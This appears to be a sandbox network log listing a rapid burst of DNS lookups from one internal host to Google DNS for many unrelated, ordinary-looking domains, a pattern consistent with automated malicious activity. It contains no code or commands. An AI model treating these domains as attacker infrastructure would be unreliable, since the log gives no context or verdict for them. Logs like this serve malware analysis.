Mar 22, 2023 05:44:45.319375038 CET	192.168.2.5	8.8.8.8	0xca11	Standard query (0)	koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.337661028 CET	192.168.2.5	8.8.8.8	0x3476	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.339315891 CET	192.168.2.5	8.8.8.8	0x897f	Standard query (0)	ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.344142914 CET	192.168.2.5	8.8.8.8	0x34ca	Standard query (0)	shanks.co.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.348845959 CET	192.168.2.5	8.8.8.8	0x72a4	Standard query (0)	daytonir.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.352399111 CET	192.168.2.5	8.8.8.8	0x4619	Standard query (0)	oozkranj.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.371094942 CET	192.168.2.5	8.8.8.8	0x6bbf	Standard query (0)	koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.481483936 CET	192.168.2.5	8.8.8.8	0x2db7	Standard query (0)	ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.490288019 CET	192.168.2.5	8.8.8.8	0x984	Standard query (0)	nlcv.bas.bg	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.494019985 CET	192.168.2.5	8.8.8.8	0x54e8	Standard query (0)	aoinko.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.495440960 CET	192.168.2.5	8.8.8.8	0x7f5c	Standard query (0)	k-nikko.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.618102074 CET	192.168.2.5	8.8.8.8	0xdeff	Standard query (0)	slower.it	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.622431040 CET	192.168.2.5	8.8.8.8	0x453f	Standard query (0)	dwid.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.636480093 CET	192.168.2.5	8.8.8.8	0x9418	Standard query (0)	zupraha.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.682871103 CET	192.168.2.5	8.8.8.8	0x50e3	Standard query (0)	89gospel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.687680006 CET	192.168.2.5	8.8.8.8	0x8af8	Standard query (0)	zemarmot.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.755279064 CET	192.168.2.5	8.8.8.8	0xad62	Standard query (0)	89gospel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.764394999 CET	192.168.2.5	8.8.8.8	0x17b4	Standard query (0)	dspears.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.868546963 CET	192.168.2.5	8.8.8.8	0xf25	Standard query (0)	oh28ya.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.888560057 CET	192.168.2.5	8.8.8.8	0x6710	Standard query (0)	89gospel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.940354109 CET	192.168.2.5	8.8.8.8	0x4867	Standard query (0)	mcseurope.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.953773022 CET	192.168.2.5	8.8.8.8	0xce86	Standard query (0)	ktenergo.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:45.953773022 CET	192.168.2.5	8.8.8.8	0x67b2	Standard query (0)	amerifor.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.051587105 CET	192.168.2.5	8.8.8.8	0x4c34	Standard query (0)	paraski.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.052150011 CET	192.168.2.5	8.8.8.8	0xc560	Standard query (0)	ktenergo.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.056703091 CET	192.168.2.5	202.12.27.33	0x75	Standard query (0)	de	NS (Name server)	IN (0x0001)	false
Mar 22, 2023 05:44:46.105372906 CET	192.168.2.5	8.8.8.8	0x1d80	Standard query (0)	banvari.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.112682104 CET	192.168.2.5	8.8.8.8	0x595d	Standard query (0)	redgiga.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.168742895 CET	192.168.2.5	8.8.8.8	0xbecd	Standard query (0)	wnit.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.171580076 CET	192.168.2.5	8.8.8.8	0x1cc8	Standard query (0)	ktenergo.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.235551119 CET	192.168.2.5	8.8.8.8	0x4841	Standard query (0)	icd-host.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.278948069 CET	192.168.2.5	8.8.8.8	0xad26	Standard query (0)	kustnara.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.314491034 CET	192.168.2.5	8.8.8.8	0xda4d	Standard query (0)	www.medisa.info	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.395981073 CET	192.168.2.5	8.8.8.8	0x3476	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.401413918 CET	192.168.2.5	8.8.8.8	0xa58	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.418404102 CET	192.168.2.5	8.8.8.8	0x2b36	Standard query (0)	oh28ya.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.430900097 CET	192.168.2.5	8.8.8.8	0x2667	Standard query (0)	gujarat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.479108095 CET	192.168.2.5	8.8.8.8	0x732	Standard query (0)	pleszew.policja.gov.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.496664047 CET	192.168.2.5	8.8.8.8	0x3361	Standard query (0)	ntc.edu.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.503252029 CET	192.168.2.5	8.8.8.8	0xdf20	Standard query (0)	bd-style.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.543267965 CET	192.168.2.5	8.8.8.8	0x5bb	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.558621883 CET	192.168.2.5	8.8.8.8	0x2d4e	Standard query (0)	nme.co.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.559721947 CET	192.168.2.5	8.8.8.8	0xac0	Standard query (0)	t-trust.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.629595041 CET	192.168.2.5	8.8.8.8	0xc348	Standard query (0)	invictus.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.634191990 CET	192.168.2.5	8.8.8.8	0x43a0	Standard query (0)	n23china.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.647768974 CET	192.168.2.5	8.8.8.8	0x6f63	Standard query (0)	slower.it	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.660454035 CET	192.168.2.5	8.8.8.8	0x1cae	Standard query (0)	portoccd.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.660571098 CET	192.168.2.5	8.8.8.8	0xb88a	Standard query (0)	tabbles.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.661647081 CET	192.168.2.5	8.8.8.8	0xb32	Standard query (0)	samtv.ro	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.661741972 CET	192.168.2.5	8.8.8.8	0x36cd	Standard query (0)	willsub.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.668667078 CET	192.168.2.5	8.8.8.8	0x98c3	Standard query (0)	ultibax.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.670208931 CET	192.168.2.5	8.8.8.8	0xbfb6	Standard query (0)	kairel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.673659086 CET	192.168.2.5	8.8.8.8	0x5c1c	Standard query (0)	n23china.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.727577925 CET	192.168.2.5	8.8.8.8	0x32a	Standard query (0)	zugseil.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.733288050 CET	192.168.2.5	8.8.8.8	0xf6e2	Standard query (0)	ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.734908104 CET	192.168.2.5	8.8.8.8	0x143	Standard query (0)	samtv.ro	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.781461954 CET	192.168.2.5	8.8.8.8	0x6a1e	Standard query (0)	hazmatt.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.790524960 CET	192.168.2.5	8.8.8.8	0x60e6	Standard query (0)	samtv.ro	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.818191051 CET	192.168.2.5	8.8.8.8	0x289a	Standard query (0)	106west.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.825289965 CET	192.168.2.5	8.8.8.8	0x9870	Standard query (0)	daytonir.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.828511953 CET	192.168.2.5	8.8.8.8	0xc631	Standard query (0)	dyag-eng.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.831722975 CET	192.168.2.5	8.8.8.8	0x2dad	Standard query (0)	ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.852652073 CET	192.168.2.5	8.8.8.8	0xbe53	Standard query (0)	dog-jog.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.854763031 CET	192.168.2.5	8.8.8.8	0x4ab4	Standard query (0)	coxkitchensandbaths.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.857122898 CET	192.168.2.5	8.8.8.8	0xa3ea	Standard query (0)	usadig.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.916356087 CET	192.168.2.5	8.8.8.8	0xd0b0	Standard query (0)	ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.941895962 CET	192.168.2.5	8.8.8.8	0x7f2f	Standard query (0)	forbin.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.945400000 CET	192.168.2.5	8.8.8.8	0x95c9	Standard query (0)	xult.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.948050976 CET	192.168.2.5	8.8.8.8	0xfc17	Standard query (0)	missnue.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.963376045 CET	192.168.2.5	8.8.8.8	0x89e2	Standard query (0)	n23china.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:46.994726896 CET	192.168.2.5	8.8.8.8	0xe06d	Standard query (0)	dyag-eng.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.059808016 CET	192.168.2.5	8.8.8.8	0xef6c	Standard query (0)	kallman.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.072770119 CET	192.168.2.5	8.8.8.8	0x7f9f	Standard query (0)	wvs-net.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.153739929 CET	192.168.2.5	8.8.8.8	0x43ed	Standard query (0)	karmy.com.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.247351885 CET	192.168.2.5	8.8.8.8	0x2935	Standard query (0)	www.reglera.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.251102924 CET	192.168.2.5	8.8.8.8	0x641b	Standard query (0)	4locals.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.251485109 CET	192.168.2.5	8.8.8.8	0x4e42	Standard query (0)	dbnet.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.255999088 CET	192.168.2.5	8.8.8.8	0x4841	Standard query (0)	icd-host.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.286884069 CET	192.168.2.5	8.8.8.8	0xcfc8	Standard query (0)	atbauk.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.291228056 CET	192.168.2.5	8.8.8.8	0x656e	Standard query (0)	adeesa.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.291491985 CET	192.168.2.5	8.8.8.8	0xcf86	Standard query (0)	atb-lit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.291940928 CET	192.168.2.5	8.8.8.8	0x56ca	Standard query (0)	pertex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.301018953 CET	192.168.2.5	8.8.8.8	0x946e	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.313117981 CET	192.168.2.5	8.8.8.8	0x5b3b	Standard query (0)	fogra.com.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.374866009 CET	192.168.2.5	8.8.8.8	0x50f7	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.396795034 CET	192.168.2.5	8.8.8.8	0x7957	Standard query (0)	top1oil.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.397907972 CET	192.168.2.5	8.8.8.8	0x2b93	Standard query (0)	nt-hat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.411324024 CET	192.168.2.5	8.8.8.8	0x38de	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.470763922 CET	192.168.2.5	8.8.8.8	0x516	Standard query (0)	rkengg.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.500585079 CET	192.168.2.5	8.8.8.8	0xea6a	Standard query (0)	shteeble.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.516453981 CET	192.168.2.5	8.8.8.8	0x8491	Standard query (0)	avc.com.sa	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.518271923 CET	192.168.2.5	8.8.8.8	0x7158	Standard query (0)	peminet.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.535675049 CET	192.168.2.5	8.8.8.8	0x1092	Standard query (0)	kumaden.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.594052076 CET	192.168.2.5	8.8.8.8	0x8ac9	Standard query (0)	pro-fa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.597137928 CET	192.168.2.5	8.8.8.8	0x5bb	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.610586882 CET	192.168.2.5	8.8.8.8	0xc5f8	Standard query (0)	umcor.am	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.612984896 CET	192.168.2.5	8.8.8.8	0x7a57	Standard query (0)	kursavto.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.631562948 CET	192.168.2.5	8.8.8.8	0x55c8	Standard query (0)	okashimo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.632618904 CET	192.168.2.5	8.8.8.8	0x28e1	Standard query (0)	mondopp.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.635297060 CET	192.168.2.5	8.8.8.8	0xdbbc	Standard query (0)	host.do	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.659704924 CET	192.168.2.5	8.8.8.8	0xedad	Standard query (0)	htsmx.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.662717104 CET	192.168.2.5	8.8.8.8	0xf2d9	Standard query (0)	refintl.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.695478916 CET	192.168.2.5	8.8.8.8	0x2d13	Standard query (0)	avc.com.sa	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.703593016 CET	192.168.2.5	8.8.8.8	0xb206	Standard query (0)	agitz.com.br	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.847620964 CET	192.168.2.5	8.8.8.8	0x23c3	Standard query (0)	agitz.com.br	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.862128019 CET	192.168.2.5	8.8.8.8	0x60bb	Standard query (0)	ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.922060966 CET	192.168.2.5	8.8.8.8	0x8602	Standard query (0)	ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.923521042 CET	192.168.2.5	8.8.8.8	0xa173	Standard query (0)	portoccd.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.940505028 CET	192.168.2.5	8.8.8.8	0xcb8d	Standard query (0)	pertex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.985666037 CET	192.168.2.5	8.8.8.8	0xf2f6	Standard query (0)	top1oil.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:47.986593962 CET	192.168.2.5	8.8.8.8	0xe717	Standard query (0)	popbook.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.024034977 CET	192.168.2.5	8.8.8.8	0x9d50	Standard query (0)	ftchat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.044486046 CET	192.168.2.5	8.8.8.8	0x51c2	Standard query (0)	daytonir.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.154979944 CET	192.168.2.5	8.8.8.8	0x1974	Standard query (0)	wolffkran.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.198420048 CET	192.168.2.5	8.8.8.8	0xab19	Standard query (0)	missnue.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.342586994 CET	192.168.2.5	8.8.8.8	0xeb5d	Standard query (0)	wolffkran.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.357413054 CET	192.168.2.5	8.8.8.8	0xb3e7	Standard query (0)	mail.airmail.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.359778881 CET	192.168.2.5	8.8.8.8	0xef5a	Standard query (0)	ldh.la.gov	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.373703957 CET	192.168.2.5	8.8.8.8	0x2eb0	Standard query (0)	pers.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.375910044 CET	192.168.2.5	8.8.8.8	0xc7c4	Standard query (0)	wolffkran.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.379503012 CET	192.168.2.5	8.8.8.8	0x3820	Standard query (0)	aoinko.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.395243883 CET	192.168.2.5	8.8.8.8	0x12f0	Standard query (0)	avc.com.sa	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.396275997 CET	192.168.2.5	8.8.8.8	0xee8a	Standard query (0)	agitz.com.br	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.408642054 CET	192.168.2.5	8.8.8.8	0x20a6	Standard query (0)	biosolve.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.502305984 CET	192.168.2.5	8.8.8.8	0x8dbc	Standard query (0)	wvs-net.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.510534048 CET	192.168.2.5	8.8.8.8	0xd4df	Standard query (0)	nt-hat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.513577938 CET	192.168.2.5	8.8.8.8	0xb2b4	Standard query (0)	burstner.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.525741100 CET	192.168.2.5	8.8.8.8	0xd22	Standard query (0)	scintel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.700758934 CET	192.168.2.5	8.8.8.8	0xbbb	Standard query (0)	araax.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.717691898 CET	192.168.2.5	8.8.8.8	0x6b8e	Standard query (0)	johnlyon.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.803158045 CET	192.168.2.5	8.8.8.8	0xd609	Standard query (0)	nt-hat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.841571093 CET	192.168.2.5	8.8.8.8	0xac72	Standard query (0)	calvinly.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:48.919739962 CET	192.168.2.5	8.8.8.8	0xf62e	Standard query (0)	4locals.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.028723955 CET	192.168.2.5	8.8.8.8	0x5fcc	Standard query (0)	ascc.org.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.047656059 CET	192.168.2.5	8.8.8.8	0x208a	Standard query (0)	touchfam.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.142956972 CET	192.168.2.5	8.8.8.8	0xa7c5	Standard query (0)	nolaoig.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.154695988 CET	192.168.2.5	8.8.8.8	0xfb40	Standard query (0)	sanfotek.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.155082941 CET	192.168.2.5	8.8.8.8	0xdb56	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.188713074 CET	192.168.2.5	8.8.8.8	0x829b	Standard query (0)	missnue.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.226541042 CET	192.168.2.5	8.8.8.8	0x178f	Standard query (0)	ciicsc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.257985115 CET	192.168.2.5	8.8.8.8	0x5888	Standard query (0)	revoldia.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.331557989 CET	192.168.2.5	8.8.8.8	0xa8dd	Standard query (0)	eos-i.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.336198092 CET	192.168.2.5	8.8.8.8	0x7f39	Standard query (0)	rappich.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.384687901 CET	192.168.2.5	8.8.8.8	0xb01f	Standard query (0)	plaske.ua	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.388459921 CET	192.168.2.5	8.8.8.8	0xea9b	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.409141064 CET	192.168.2.5	8.8.8.8	0xad8b	Standard query (0)	chzko.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.432466030 CET	192.168.2.5	8.8.8.8	0x5309	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.469203949 CET	192.168.2.5	8.8.8.8	0x5f90	Standard query (0)	forbin.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.480010033 CET	192.168.2.5	8.8.8.8	0x4140	Standard query (0)	bount.com.tw	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.488292933 CET	192.168.2.5	8.8.8.8	0x1660	Standard query (0)	grlawcc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.490732908 CET	192.168.2.5	8.8.8.8	0xb667	Standard query (0)	ifesnet.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.517118931 CET	192.168.2.5	8.8.8.8	0x99a7	Standard query (0)	mikihan.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.519979954 CET	192.168.2.5	8.8.8.8	0x754e	Standard query (0)	apcotex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.529270887 CET	192.168.2.5	8.8.8.8	0xd406	Standard query (0)	amic.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.571296930 CET	192.168.2.5	8.8.8.8	0x5eb5	Standard query (0)	ossir.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.601588011 CET	192.168.2.5	8.8.8.8	0x5224	Standard query (0)	smitko.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.608030081 CET	192.168.2.5	8.8.8.8	0xdadb	Standard query (0)	siongann.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.611320019 CET	192.168.2.5	8.8.8.8	0x5bb	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.635008097 CET	192.168.2.5	8.8.8.8	0x6533	Standard query (0)	piacton.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.667820930 CET	192.168.2.5	8.8.8.8	0xbdb6	Standard query (0)	vonparis.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.672924995 CET	192.168.2.5	8.8.8.8	0x5e49	Standard query (0)	pers.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.687251091 CET	192.168.2.5	8.8.8.8	0x54cc	Standard query (0)	redgiga.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.728131056 CET	192.168.2.5	8.8.8.8	0xec15	Standard query (0)	vivastay.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.820077896 CET	192.168.2.5	8.8.8.8	0x3e75	Standard query (0)	uster.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.891796112 CET	192.168.2.5	8.8.8.8	0x8387	Standard query (0)	iranytu.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.911098957 CET	192.168.2.5	8.8.8.8	0x353d	Standard query (0)	any-s.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.915874958 CET	192.168.2.5	8.8.8.8	0x2e80	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.928859949 CET	192.168.2.5	8.8.8.8	0xfff7	Standard query (0)	popbook.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:49.946418047 CET	192.168.2.5	8.8.8.8	0x16a6	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.013046026 CET	192.168.2.5	8.8.8.8	0xb4d8	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.034919977 CET	192.168.2.5	8.8.8.8	0x4e24	Standard query (0)	assideum.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.037059069 CET	192.168.2.5	8.8.8.8	0x298c	Standard query (0)	portoccd.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.104860067 CET	192.168.2.5	8.8.8.8	0x31aa	Standard query (0)	michiana.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.208817959 CET	192.168.2.5	8.8.8.8	0xb50c	Standard query (0)	envogen.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.222316027 CET	192.168.2.5	8.8.8.8	0xc873	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.267394066 CET	192.168.2.5	8.8.8.8	0x8cd7	Standard query (0)	www.koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.278369904 CET	192.168.2.5	8.8.8.8	0x3a0f	Standard query (0)	scip.org.uk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.286222935 CET	192.168.2.5	8.8.8.8	0x6045	Standard query (0)	ccrsi.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.287717104 CET	192.168.2.5	8.8.8.8	0x4133	Standard query (0)	burstner.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.324107885 CET	192.168.2.5	8.8.8.8	0xe24e	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.338076115 CET	192.168.2.5	8.8.8.8	0x9b56	Standard query (0)	skgm.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.377026081 CET	192.168.2.5	8.8.8.8	0xb228	Standard query (0)	www.usadig.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.441170931 CET	192.168.2.5	8.8.8.8	0xee39	Standard query (0)	michiana.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.563818932 CET	192.168.2.5	8.8.8.8	0x354b	Standard query (0)	atb-lit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.565865993 CET	192.168.2.5	8.8.8.8	0x8aad	Standard query (0)	averwin.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.568461895 CET	192.168.2.5	8.8.8.8	0x4a2b	Standard query (0)	dog-jog.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.584769011 CET	192.168.2.5	8.8.8.8	0x2916	Standard query (0)	valselit.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.596312046 CET	192.168.2.5	8.8.8.8	0x4773	Standard query (0)	kayoaiba.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.705713034 CET	192.168.2.5	8.8.8.8	0x7c67	Standard query (0)	ncn.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.718532085 CET	192.168.2.5	8.8.8.8	0xa18a	Standard query (0)	shteeble.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.912658930 CET	192.168.2.5	8.8.8.8	0x5ea4	Standard query (0)	cubodown.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.040970087 CET	192.168.2.5	8.8.8.8	0xb528	Standard query (0)	michiana.org	A (IP address)	IN (0x0001)	false
